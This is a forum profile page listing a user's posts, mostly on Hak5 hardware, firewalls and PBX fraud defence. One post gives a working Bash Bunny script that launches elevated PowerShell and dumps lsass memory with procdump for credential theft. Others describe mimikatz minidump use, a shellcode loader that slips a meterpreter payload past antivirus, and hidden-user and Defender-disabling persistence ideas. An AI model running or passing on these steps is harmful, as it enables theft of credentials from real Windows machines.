rottingsun
-
Posts
95 -
Joined
-
Last visited
-
Days Won
2
Posts posted by rottingsun
-
-
With mimikatz and all the derivatives being flagged more and more these days, I find it more effective to take a memdump of lsass using procdump, then running it through mimi in minidump mode.
-
Here's my working code for running an executable (procdump) from the bunny within powershell and the saving the dump file to the bunny, given the user has local admin privs to begin with. Note that in the line that runs procdump, the & character occurs at the front of the command. It is a special powershell operator that evaluates the text following the & character as a command and not a powershell object.
LED Y 100
source bunny_helpers.sh
LED B 100
ATTACKMODE HID STORAGE
Q GUI r
Q DELAY 500
Q STRING powershell Start-Process powershell -Verb runAs
Q ENTER
Q DELAY 1000
Q ALT y
Q DELAY 500
Q STRING \$bunny\=\(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
Q DELAY 500
Q ENTER
Q DELAY 500
Q STRING \& \$bunny\\payloads\\$SWITCH_POSITION\\Procdump\\procdump.exe -accepteula -ma lsass.exe \$bunny\\loot\\takeadump\\lsd.dmp
Q ENTERQ DELAY 200
Q STRING \$driveEject\=New-Object -comObject Shell.Application
Q ENTER
Q DELAY 200
Q STRING \$driveEject.Namespace\(17\).ParseName\(\$bunny\).InvokeVerb\(\"Eject\"\)
Q ENTER
Q DELAY 200Q STRING exit
Q ENTER
LED FINISH -
3 hours ago, B0rk said:
It should only be blocking the shell.bat file as it is known by AV mfg's. It was only put on there as an example/placeholder (the LHOST is set to 10.10.10.10 and LPORT to 8443). It's just a Veil-Evasion generated payload. Everything else should execute just fine.
A technique I've been experimenting with that gets past both Win Defender and Vipre AV currently is a custom shellcode loader, as per http://www.attactics.org/2016/03/bypassing-antivirus-with-10-lines-of.html. I've used the loader almost verbatim with a shikata_na_gai meterpreter rev_tcp payload to successfully bypass both.
-
The latest Empire stagers actually have a bunny target.
-
4 minutes ago, Vert said:
when you connect over rdp it pops a 30 sec window saying ok or cancel that another user is logging in it isn't very sneaky the way this is setup. if someone knows a better sneakier method it could be interesting as i noted my intent was legit usage for system repairs.
Very nice. I actually never thought of the bunny/ducky in the context of legitimate uses.
I got a bunny personally so I can demo to management what happens if I grant a non-IT user local admin perms like I sometimes get asked.
-
I believe RDP locks the session of the currently logged in user, which would be a dead give away. Would this payload be more in the context of a sneak attack while a user is away? Not knocking it - just wondering the intent.
-
2 hours ago, Broti said:
My favourite password manager: KeePass. Open source and it supports different systems
KeePass is really awesome. Just make sure an attacker using Empire doesn't get a shell on your system. It includes a module called KeeThief which can display your master password in cleartext.
-
I ordered a bunny late last night. Looking forward to trying out this payload and maybe adding in the concepts I mentioned.
-
2 minutes ago, B0rk said:
chill and have an alco beverage or something
I would but I don't wanna be hungover for work tomorrow.
-
8 minutes ago, Dave-ee Jones said:
Thing is, to create an Admin user you first need Admin rights, therefore you don't really get anywhere with creating a Meterpreter payload.
Right, but this payload actually does assume that the machine being attacked is already logged in with admin rights as per the description -
#OS: Windows (Requires Powershell and Admin Rights)This would be a great payload for the case of a target running say Windows 10 Home as the default user that also happens to be part of the Local Admins group. It's safe to assume that probably alot of home users run Windows like that. On the other hand, this payload should NEVER work in a corporate/AD environment if even the most basic security practices are being followed. I am sure we'd all be shocked though at the number of AD setups where every user is a local admin, and god forbid, a domain admin.
-
56 minutes ago, Dave-ee Jones said:
I was thinking of doing something like this - passing credentials to a PC to create a user, but then someone *glares at Posh* was like "No you idiot, that can't be done because that was an old type of hack that got patched ages ago!"
But you have shown here that it can be done :)
Anything can be done with a little ingenuity and local admin privs, which this payload does assume that the logged in user has. I have several ideas that could enhance this already good payload, including:
- The one I previously posted about. That is, making the new user invisible to the Windows logon screen.
- Creating an elevated scheduled task (Run with Highest Privileges option) with the new user creds. The task executes a meterpreter payload to connect back to the attacking machine after 1 minute, 5 minutes, whatever. The meterpreter session created from the scheduled task returns with UAC already bypassed, allowing for a simple getsystem command to elevate within meterpreter. EDIT: Actually it looks like meterpreter shell already does this the way it's implemented here.
- Using Set-MpPreference to disable Windows Defender, although this is a bit "noisy" since it displays a tray popup. An alternative would be to use Set-MpPreference to set a folder exception for Windows Defender before copying any binaries that might otherwise be flagged from the bunny to the exception folder.
- Use powershell to add a Windows Firewall exception to allow all incoming traffic from your attacking IP.
The possibilities are endless. I guess I just need to break down and order a bunny.
-
1
-
-
Very nice payload. It'd be sweet to go even a step further and hide the new user from the Windows login screen with reg commands, as per the technique outlined in this post:
http://www.windowscentral.com/how-hide-specific-user-accounts-sign-screen-windows-10
-
Here is what I always used for enumerating the duck by the label DUCKY -
for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duckydrive=%d
Then the ducky can actually be referenced by letter with the env var %duckydrive%.
-
On 4/30/2017 at 4:01 PM, Shad0wXiph0n said:
Quite fond of Palo Alto firewalls myself although not a big fan of the slow config commit times!
This. If your company can afford one, you will be blown away vs all others.
-
I think you can use the analog trunk cards to connect the Asterisk server to a legacy PBX system. Normally they'd be used to trunk out to the physical phone lines. It would only make sense if you needed to transition a larger PBX to a VoIP system without serious service interruption.
Yes you can, but depending on the systems, it can be somewhat of a major pain in the ass to get it working just right.
-
Actually interested to see if Hak5 has any thoughts on the situation (good, bad, or indifferent)? Seems like the entire deal was a bit bizarre.
-
It was my understanding that pineap did work in that manner - that is, broadcast out SSIDs based on client probes. I could easily have gotten that wrong though. The audio on the talk was pretty bad. We may just have to wait for a tech doc or a follow up hangout.
-
Not at all. Expose flaws so they get fixed. The flaws that we discovered have already been fixed in 2.0 we just want to show what it was and how it was fixed
Not I get that - it just seems like the way he's going about it is totally ego driven.
-
What's this guy's deal? Just to try to embarrass Darren and Seb?
-
I always travel with only 2 bags, both of which I usually carry onto the plane (I don't like checking because of chances for lost luggage or theft). One is a small brown leather bag containing all of my clothes, and the other is my laptop backpack. That's the main reason I was asking the question really - if the overlords at the x-ray machine will make a fuss over a pineapple.
-
Not sure why anyone would believe that you cannot fly with this device. It is an Access Point just as any other access point.
Have you ever dealt with a TSA employee on a power trip?
-
What is the budget we're talking here? Would you consider using your own server and putting the software on it yourself, are or you looking more for something like a turn key appliance?
-
Anyone have any experience with carrying a MK5 through TSA? Are they trained to identify and confiscate them now, or can I get away with saying that the plain black device with 2 antennas is my "mobile router"?
-
Just for some additional background, Palo Alto Networks is a firewall company started by Nir Zuk. It's up for debate who was the very first to come up with the tech, but Nir Zuk is widely reputed to be the guy who invented stateful packet inspection while working for Check Point Software. Stateful inspection is the tech that most all modern enterprise firewalls are based on. It's a huge compliment (in my humble opinion, at least) that a company like PAN mentioned the Pineapple by name.
PBX fraud
in Business and Enterprise IT
Posted
There's a few basic strategies, some hardware based and some software based. Normally a special type of firewall called a session border controller is placed in front of the PBX. They're designed to address issues like toll fraud. Other things can be done too though. General PBX hardening best practices should be enforced, like strong SIP account passwords, limiting SIP sessions to only your authorized private subnets, not allowing outgoing international calling, not allowing outgoing calling to offshore US territories, turning off call transfer feature codes for incoming calls, not exposing your PBX directly to a public IP, etc. On top of that, you must monitor logs regularly.
Here's a presentation that's FreePBX based but includes general best practices.
https://player.vimeo.com/video/130328541